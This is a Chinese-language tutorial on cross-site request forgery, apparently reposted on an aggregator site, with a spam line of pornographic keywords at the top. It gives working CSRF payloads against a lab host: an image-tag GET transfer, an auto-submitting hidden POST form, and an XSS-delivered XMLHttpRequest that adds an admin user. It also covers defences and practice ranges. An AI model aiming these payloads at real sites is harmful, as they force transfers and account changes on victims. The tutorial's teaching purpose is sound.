国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

滲透測試漏洞原理之---【CSRF跨站請求偽造】

這篇具有很好參考價值的文章主要介紹了滲透測試漏洞原理之---【CSRF跨站請求偽造】。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

1、CSRF概述

1.1、基本原理
1.1.1、基本概念

跨站請求偽造(Cross Site Request Forgery,CSRF)是一種攻擊,它強制瀏覽器客戶端用戶在當前對其進行身份驗證后的Web 應(yīng)用程序上執(zhí)行非本意操作的攻擊,攻擊的重點在于更改狀態(tài)的請求,而不是盜取數(shù)據(jù),因為攻擊者無法查看偽造請求的響應(yīng)。

借助于社工的一些幫助,例如,通過電子郵件或聊天發(fā)送鏈接,攻擊者可以誘騙用戶執(zhí)行攻擊者選擇的操作。如果受害者是普通用戶,則成功的CSRF 攻擊可以強制用戶執(zhí)行更改狀態(tài)的請求,例如轉(zhuǎn)移資金、修改密碼等操作。如果受害者是管理賬戶,CSRF 攻擊會危及整個Web 應(yīng)用程序。

CSRF,跨站域請求偽造,通常攻擊者會偽造一個場景(例如一條鏈接),來誘使用戶點擊,用戶一旦點擊,黑客的攻擊目的也就達到了,他可以盜用你的身份,以你的名義發(fā)送惡意請求。CSRF攻擊的關(guān)鍵就是利用受害者的cookie向服務(wù)器發(fā)送偽造請求。

和XSS有什么不同?

CSRF是以用戶的權(quán)限去做事情,自己本身并沒有獲取到權(quán)限;XSS是直接盜取了用戶的權(quán)限進行攻擊。

1.1.2、關(guān)鍵點
  • 受害者沒有退出登錄,受害者保持身份認證。
  • CSRF 繼承了受害者的身份和特權(quán),代表受害者執(zhí)行非本意的、惡意的操作。
  • CSRF 會借用瀏覽器中與站點關(guān)聯(lián)的所有身份憑據(jù),例如用戶的會話Cookie,IP 地址,Windows 域憑據(jù)等。
1.1.3、目標

CSRF 的目標是更改用戶賬戶的狀態(tài),攻擊者利用CSRF 發(fā)送的請求都是更改狀態(tài)的請求,比如,轉(zhuǎn)賬、更改密碼,購買商品等等。

CSRF 的場景中,攻擊者是沒有辦法獲得服務(wù)器的響應(yīng)。

1.2、CSRF場景
1.2.1、銀行支付轉(zhuǎn)賬

模擬搭建銀行網(wǎng)站http://192.168.80.139/bank/

滲透測試漏洞原理之---【CSRF跨站請求偽造】,# 滲透測試,csrf,前端,網(wǎng)絡(luò)安全

1.2.2構(gòu)造虛假網(wǎng)站

構(gòu)造CSRF 攻擊連接

<meta charset='utf-8'>
<img src='./1.jpg'><br />
<img src='http://192.168.80.139/bank/action.php?
username=hacker&money=100&submit=%E4%BA%A4%E6%98%93'
alt='金陵十三釵'>
  • 攻擊者通過 <img> 標簽構(gòu)造GET 請求。

  • 瀏覽器根據(jù) <img> 標簽中的SRC屬性,請求服務(wù)器資源,會自動帶上身份認證信息

1.2.3、場景建模

滲透測試漏洞原理之---【CSRF跨站請求偽造】,# 滲透測試,csrf,前端,網(wǎng)絡(luò)安全

1.3、CSRF類別

以上場景中完成轉(zhuǎn)賬的關(guān)鍵操作是GET 請求。把轉(zhuǎn)賬操作改用POST 請求,是不是就能夠防御CSRF 漏洞了呢?

1.3.1、POST方式
<meta charset='utf-8'>
<form name='csrf' action='http://192.168.80.139/bank/action.php' method='post'>
<input type='hidden' name='username' value='hacker'>
<input type='hidden' name='money' value='100'>
</form>
<script>document.csrf.submit()</script>
<img src="./1.jpg" ><br />
<!--<a href='javascript:document.csrf.submit()' style='color:red;font-size:100px'>寶刀在手,誰與爭鋒</a><br />
1.4、CSRF驗證
1.4.1、CSRF PoC Generator

PoC:漏洞驗證代碼

Burp Suite 自帶插件,可以根據(jù)請求構(gòu)造表單,進行CSRF 漏洞驗證

滲透測試漏洞原理之---【CSRF跨站請求偽造】,# 滲透測試,csrf,前端,網(wǎng)絡(luò)安全

修改密碼在瀏覽器中測試

滲透測試漏洞原理之---【CSRF跨站請求偽造】,# 滲透測試,csrf,前端,網(wǎng)絡(luò)安全

滲透測試漏洞原理之---【CSRF跨站請求偽造】,# 滲透測試,csrf,前端,網(wǎng)絡(luò)安全

點擊Submit request后,密碼就會被修改

滲透測試漏洞原理之---【CSRF跨站請求偽造】,# 滲透測試,csrf,前端,網(wǎng)絡(luò)安全

2、CSRF攻防

2.1、CSRF實戰(zhàn)
2.1.1、與XSS 漏洞相結(jié)合

先使用BurpSuite工具抓取添加用戶的數(shù)據(jù)包,

滲透測試漏洞原理之---【CSRF跨站請求偽造】,# 滲透測試,csrf,前端,網(wǎng)絡(luò)安全

POST /cms/admin/user.action.php HTTP/1.1
Host: 192.168.80.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Origin: http://192.168.80.139
Connection: close
Referer: http://192.168.80.139/cms/admin/user.add.php?act=add
Cookie: username=admin; userid=1; PHPSESSID=87u2eq7ctm4468snmmg772vns7
Upgrade-Insecure-Requests: 1

act=add&username=zs&password=123&password2=123&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0

攻擊者可以利用XSS 觸發(fā)CSRF 攻擊。因為,可以利用JS 發(fā)送HTTP 請求。經(jīng)過研究受害網(wǎng)站的業(yè)務(wù)流程,可以構(gòu)造如下代碼:

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://192.168.80.139/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=zs&password=123.com&password2=123.com&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

把JS代碼提交都留言板上

滲透測試漏洞原理之---【CSRF跨站請求偽造】,# 滲透測試,csrf,前端,網(wǎng)絡(luò)安全

使用管理員用戶查看留言板信息,在點擊留言板這個選項卡的時候就觸發(fā)了XSS代碼,進行了CSRF跨站攻擊

然后使用修改后的密碼,登錄后臺

滲透測試漏洞原理之---【CSRF跨站請求偽造】,# 滲透測試,csrf,前端,網(wǎng)絡(luò)安全

2.2、CSRF防御
2.2.1、無效防御
  • 使用秘密的Cookie
  • 僅接收POST 請求
  • 多步交易:多步交易,有可能會被惡意攻擊者預(yù)測
  • URL 重寫:用戶的身份信息會暴露在URL 中,不建議通過引入另外一個漏洞來解決當前漏洞
  • HTTPS:所有安全機制的前提
2.2.2、有效防御

1、驗證Referer字段

  • 當前URL的上一個URL,就是該頁面是從那個頁面過來的
  • 轉(zhuǎn)賬頁面到轉(zhuǎn)賬操作
  • 偽造?

2、添加Token驗證

滲透測試漏洞原理之---【CSRF跨站請求偽造】,# 滲透測試,csrf,前端,網(wǎng)絡(luò)安全

3、二次驗證:在關(guān)鍵操作之前,再輸入密碼或者驗證碼

4、HttpOnly:某些情況下禁止JS 腳本訪問Cookie 信息

5、SameSite:Cookie 屬性,瀏覽器自帶安全機制

3、靶場練習

DVWA靶場CSRF練習

Pikachu靶場CSRF練習文章來源地址http://www.zghlxwxcb.cn/news/detail-690732.html

到了這里,關(guān)于滲透測試漏洞原理之---【CSRF跨站請求偽造】的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • CSRF(跨站請求偽造)和SSRF(服務(wù)端請求偽造)漏洞復現(xiàn):風險與防護方法

    這篇文章旨在用于網(wǎng)絡(luò)安全學習,請勿進行任何非法行為,否則后果自負。? 環(huán)境準備 示例: 假設(shè)用戶在銀行網(wǎng)站A上登錄并保持會話活動,同時他也在瀏覽其他網(wǎng)站。攻擊者在一個不可信任的網(wǎng)站B上創(chuàng)建了一個惡意鏈接,當用戶點擊該鏈接時,會自動向銀行網(wǎng)站A發(fā)送一個

    2024年02月10日
    瀏覽(99)
  • CSRF(跨站請求偽造)

    CSRF(跨站請求偽造)

    CSRF(Cross Site Request Forgery, 跨站請求偽造 )。是一種對網(wǎng)站的惡意利用, 通過偽裝來自受信任用戶的請求來利用受信任的網(wǎng)站 。 原理 是攻擊者構(gòu)造網(wǎng)站后臺某個功能接口的請求地址,誘導用戶去點擊或者用特殊方法讓該請求地址自動加載。用戶在登錄狀態(tài)下這個請求被服

    2024年01月16日
    瀏覽(91)
  • 跨站請求偽造(CSRF)

    跨站請求偽造(CSRF)

    1.1 基本概念 ? 跨站請求偽造(Cross Site Request Forgery,CSRF)是一種攻擊,它強制瀏覽器客戶端用戶在當前對其進行身份驗證后的Wb應(yīng)用程序上執(zhí)行非本意操作的攻擊,攻擊的重點在于更改狀態(tài)的請求,而不是盜取數(shù)據(jù),因為攻擊者無法查看偽造請求的響應(yīng)。 ? 借助于社工的一些幫

    2024年02月10日
    瀏覽(91)
  • CSRF - 跨站請求偽造

    CSRF - 跨站請求偽造

    目錄 1、什么是CSRF 2、CSRF的攻擊過程和原理 3、CSRF的類型有哪些 4、CSRF的防御 5、CSRF與XSS有何不同 6、沒有防御的CSRF 跨站請求偽造(Cross-site request forgery),CSRF是指利用受害者尚未失效的身份認證信息(登錄狀態(tài)中的Cookie等),誘騙受害者點擊惡意鏈接,或者訪問包含攻擊代

    2024年04月08日
    瀏覽(94)
  • 跨站請求偽造(CSRF)

    CSRF(Cross-Site Request Forgery)跨站請求偽造是一種常見的網(wǎng)絡(luò)安全攻擊,它利用用戶在已經(jīng)登錄的網(wǎng)站上的身份驗證信息來執(zhí)行惡意操作。 攻擊者通過誘使受害者在本地瀏覽器中打開一個惡意網(wǎng)站,這個網(wǎng)站會發(fā)送一個自動執(zhí)行的請求到目標網(wǎng)站。由于受害者已經(jīng)在目標網(wǎng)站上

    2024年02月17日
    瀏覽(90)
  • 瀏覽器安全之CSRF跨站請求偽造

    跨站請求偽造(Cross-site request forgery) 簡稱 CSRF ,盡管與跨站腳本漏洞名稱相近,但它與跨站腳本漏洞不同。 XSS 利用站點內(nèi)的信任用戶,而 CSRF 則通過偽裝來自受信任用戶的請求來利用受信任的網(wǎng)站。 CSRF和反射型XSS的主要區(qū)別是: 反射型XSS 的目的是在客戶端執(zhí)行腳本,

    2024年02月02日
    瀏覽(89)
  • 21 - form表單驗證 和 csrf跨站請求偽造

    ???? ? ? (1). 官網(wǎng): ? ? ? ????????(2). 安裝第三方庫 ? ? ? ? ?(3). form類型和校驗 ? ? ? ? ? ? (1). settings.py 設(shè)置隨機字符串 ? ? ? ? (2). app.py? 全局使用csrf保護 ? ? ? ? (1). 新建form.py 文件, 定義 form 表單數(shù)據(jù) ????????(2). view.py 調(diào)用表單對象 ,返回給前端 ?????

    2024年02月10日
    瀏覽(95)
  • jenkins 關(guān)閉關(guān)閉CSRF Protection(跨站請求偽造保護)

    jenkins 關(guān)閉關(guān)閉CSRF Protection(跨站請求偽造保護)

    我的jenkins版本是:2.332.4 Jenkins版本自2.204.6以來的重大變更有:刪除禁用 CSRF 保護的功能。 從較舊版本的 Jenkins 升級的實例將啟用 CSRF 保護和設(shè)置默認的發(fā)行者,如果之前被禁用。 老版本Jenkins的CSRF保護功能只需要在 系統(tǒng)管理 全局安全配置 中便可進行打開或者關(guān)閉。讓人頭

    2024年02月15日
    瀏覽(95)
  • 網(wǎng)絡(luò)安全進階學習第三課——CSRF跨站請求偽造

    會話跟蹤是Web程序中常用的技術(shù),用來跟蹤用戶的整個會話。常用的會話跟蹤技術(shù)是Cookie與Session。 Cookie是一個保存在客戶機中的簡單的文本文件,當我們使用自己的電腦,通過瀏覽器進行訪問網(wǎng)頁的時候,服務(wù)器就會生成一個證書然后返回給瀏覽器并寫入我們的本地電腦,這

    2024年02月12日
    瀏覽(20)
  • 徹底理解前端安全面試題(2)—— CSRF 攻擊,跨站請求偽造攻擊詳解,建議收藏(含源碼)

    徹底理解前端安全面試題(2)—— CSRF 攻擊,跨站請求偽造攻擊詳解,建議收藏(含源碼)

    前端關(guān)于網(wǎng)絡(luò)安全看似高深莫測,其實來來回回就那么點東西,我總結(jié)一下就是 3 + 1 ?= 4,3個用字母描述的【分別是 XSS、CSRF、CORS】 + 一個中間人攻擊。當然 CORS 同源策略是為了防止攻擊的安全策略,其他的都是網(wǎng)絡(luò)攻擊。除了這 4 個前端相關(guān)的面試題,其他的都是一些不常

    2024年02月03日
    瀏覽(16)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包